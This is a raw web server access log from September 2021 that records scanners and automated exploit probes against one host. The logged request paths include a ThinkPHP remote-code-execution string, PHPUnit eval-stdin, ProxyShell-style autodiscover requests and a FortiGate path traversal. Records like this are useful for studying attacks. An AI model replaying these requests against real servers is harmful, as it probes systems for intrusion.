AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Sep/2021:22:34:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Sep/2021:22:34:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Sep/2021:22:34:15 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Sep/2021:22:34:19 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Sep/2021:22:34:21 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Sep/2021:22:34:21 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Sep/2021:22:34:23 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Sep/2021:22:34:24 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [25/Sep/2021:22:34:26 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Sep/2021:22:34:27 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Sep/2021:22:55:15 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.209.88] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Sep/2021:22:55:41 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.216.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Sep/2021:22:55:52 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.221.231] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Sep/2021:23:53:21 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.199.181] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Sep/2021:01:31:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.212] [Length 0] [Gzip -] "-" "-" [26/Sep/2021:01:40:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [26/Sep/2021:03:57:19 +0000] 400 - - http localhost "-" [Client 78.128.112.18] [Length 154] [Gzip -] "-" "-" [26/Sep/2021:04:15:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.113] [Length 0] [Gzip -] "-" "-" [26/Sep/2021:04:15:38 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.113] [Length 252] [Gzip -] "-" "-" [26/Sep/2021:04:15:38 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.113] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [26/Sep/2021:04:27:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [26/Sep/2021:04:40:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.44] [Length 0] [Gzip -] "-" "-" [26/Sep/2021:04:40:19 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.44] [Length 252] [Gzip -] "-" "-" [26/Sep/2021:04:40:19 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.44] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [26/Sep/2021:05:12:00 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.206.42] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Sep/2021:05:54:21 +0000] 400 - - http localhost "-" [Client 172.104.131.24] [Length 154] [Gzip -] "-" "-" [26/Sep/2021:08:33:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.201.145] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Sep/2021:08:48:25 +0000] 400 - POST http 64.22.31.253 "/65735098" [Client 181.214.206.181] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:21.0) Gecko/20130514 Firefox/21.0" "-" [26/Sep/2021:08:48:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.209.125.15] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [26/Sep/2021:08:54:16 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [26/Sep/2021:09:02:43 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 107.189.31.252] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [26/Sep/2021:09:20:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.89.5.20] [Length 0] [Gzip -] "-" "-" [26/Sep/2021:09:51:03 +0000] 444 - GET https 64.22.31.253 "/autodiscover/autodiscover.json?@abc.com/owa/?&Email=autodiscover/autodiscover.json%3F@abc.com" [Client 198.144.189.74] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [26/Sep/2021:10:44:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 135.125.137.236] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [26/Sep/2021:10:44:51 +0000] 400 - - https localhost "-" [Client 135.125.137.236] [Length 154] [Gzip -] "-" "-" [26/Sep/2021:10:44:52 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 207.244.70.35] [Length 0] [Gzip -] "-" "-" [26/Sep/2021:10:44:54 +0000] 444 - OPTIONS https localhost "/" [Client 207.244.70.35] [Length 0] [Gzip -] "-" "-" [26/Sep/2021:10:44:59 +0000] 400 - - https localhost "-" [Client 207.244.70.35] [Length 154] [Gzip -] "-" "-" [26/Sep/2021:11:40:10 +0000] 400 - GET http 64.22.31.253 "/" [Client 141.98.83.139] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0" "-" [26/Sep/2021:12:34:58 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.210.201] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Sep/2021:13:32:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [26/Sep/2021:13:37:51 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Sep/2021:13:59:32 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 91.132.58.62] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.41.1.el7.x86_64" "-" [26/Sep/2021:14:30:34 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [26/Sep/2021:15:29:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.62.117.51] [Length 0] [Gzip -] "-" "-" [26/Sep/2021:17:02:31 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [26/Sep/2021:17:02:31 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [26/Sep/2021:17:02:31 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [26/Sep/2021:17:02:31 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [26/Sep/2021:17:02:31 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [26/Sep/2021:17:02:31 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [26/Sep/2021:18:35:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.57.29] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "-" [26/Sep/2021:18:35:23 +0000] 400 - GET http clientapi.ipip.net "/echo.php?info=20210927023431" [Client 103.203.57.29] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64)" "-" [26/Sep/2021:19:40:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 139.59.25.218] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41" "-" [26/Sep/2021:20:09:27 +0000] 400 - GET http localhost "/" [Client 178.62.91.245] [Length 252] [Gzip -] "-" "-" [26/Sep/2021:21:17:35 +0000] 400 - GET http 64.22.31.253 "/manager/text/list" [Client 192.241.204.106] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Sep/2021:22:05:28 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [26/Sep/2021:22:51:05 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 107.189.31.252] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [26/Sep/2021:22:53:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.249.246.151] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [26/Sep/2021:22:54:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.14.35.145] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [26/Sep/2021:22:54:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.91.96.133] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [26/Sep/2021:22:55:56 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.221.230] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Sep/2021:22:56:52 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.216.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Sep/2021:22:57:40 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.200.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Sep/2021:23:55:19 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.206.208] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Sep/2021:00:11:29 +0000] 400 - GET http 64.22.31.253 "/manager/html" [Client 192.241.201.106] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Sep/2021:00:50:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.139.67] [Length 0] [Gzip -] "-" "-" [27/Sep/2021:01:34:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 213.32.122.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [27/Sep/2021:01:34:16 +0000] 400 - GET http 64.22.31.253 "/" [Client 213.32.122.82] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [27/Sep/2021:02:03:49 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Sep/2021:02:03:51 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Sep/2021:02:03:52 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Sep/2021:02:03:53 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Sep/2021:02:03:54 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Sep/2021:02:03:54 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [27/Sep/2021:02:03:56 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Sep/2021:02:03:57 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Sep/2021:02:03:58 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Sep/2021:02:04:00 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Sep/2021:02:04:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Sep/2021:02:04:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Sep/2021:02:05:23 +0000] 400 - - http localhost "-" [Client 94.232.42.169] [Length 154] [Gzip -] "-" "-" [27/Sep/2021:04:59:04 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [27/Sep/2021:05:29:55 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.201.221] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Sep/2021:05:30:10 +0000] 400 - - http localhost "-" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [27/Sep/2021:05:35:21 +0000] 400 - GET http 64.22.31.253 "/" [Client 45.9.73.95] [Length 252] [Gzip -] "-" "-" [27/Sep/2021:05:38:35 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [27/Sep/2021:06:21:55 +0000] 444 - GET https 64.22.31.253 "/_asterisk/" [Client 77.247.108.81] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [27/Sep/2021:06:25:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.66.88.100] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [27/Sep/2021:06:47:10 +0000] 400 - GET http 64.22.31.253 "/admin/config.php" [Client 77.247.108.81] [Length 252] [Gzip -] "python-requests/2.26.0" "-" [27/Sep/2021:07:35:58 +0000] 444 - GET https 64.22.31.253 "/autodiscover/autodiscover.json?@evil.corp/ews/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp" [Client 45.155.204.227] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [27/Sep/2021:08:46:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.200.172] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Sep/2021:09:34:39 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.0 Safari/534.3" "-" [27/Sep/2021:10:53:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.59] [Length 0] [Gzip -] "-" "-" [27/Sep/2021:10:53:33 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.59] [Length 252] [Gzip -] "-" "-" [27/Sep/2021:10:53:33 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.59] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [27/Sep/2021:11:13:28 +0000] 444 - GET https booksonic.moralanimal.net "/" [Client 92.118.160.5] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [27/Sep/2021:12:34:14 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.195.59] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Sep/2021:13:38:49 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [27/Sep/2021:14:49:16 +0000] 400 - POST http 64.22.31.253 "/" [Client 195.78.54.242] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8" "-" [27/Sep/2021:15:16:24 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Sep/2021:15:16:25 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Sep/2021:15:16:26 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Sep/2021:15:16:28 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Sep/2021:15:16:28 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Sep/2021:15:16:30 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Sep/2021:15:16:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Sep/2021:15:16:33 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Sep/2021:15:16:33 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [27/Sep/2021:15:16:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Sep/2021:15:16:36 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Sep/2021:15:16:38 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Sep/2021:16:24:28 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [27/Sep/2021:17:02:24 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [27/Sep/2021:17:02:24 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [27/Sep/2021:17:02:24 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [27/Sep/2021:17:02:24 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [27/Sep/2021:17:02:24 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [27/Sep/2021:17:02:24 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [27/Sep/2021:17:12:05 +0000] 400 - - http localhost "-" [Client 89.248.165.205] [Length 154] [Gzip -] "-" "-" [27/Sep/2021:17:37:23 +0000] 444 - GET https localhost "/" [Client 47.242.93.242] [Length 0] [Gzip -] "-" "-" [27/Sep/2021:17:37:24 +0000] 444 - OPTIONS https localhost "/" [Client 47.242.93.242] [Length 0] [Gzip -] "-" "-" [27/Sep/2021:17:37:25 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 47.242.93.242] [Length 0] [Gzip -] "-" "-" [27/Sep/2021:17:37:26 +0000] 400 - - https localhost "-" [Client 47.242.93.242] [Length 154] [Gzip -] "-" "-" [27/Sep/2021:17:37:31 +0000] 400 - - https localhost "-" 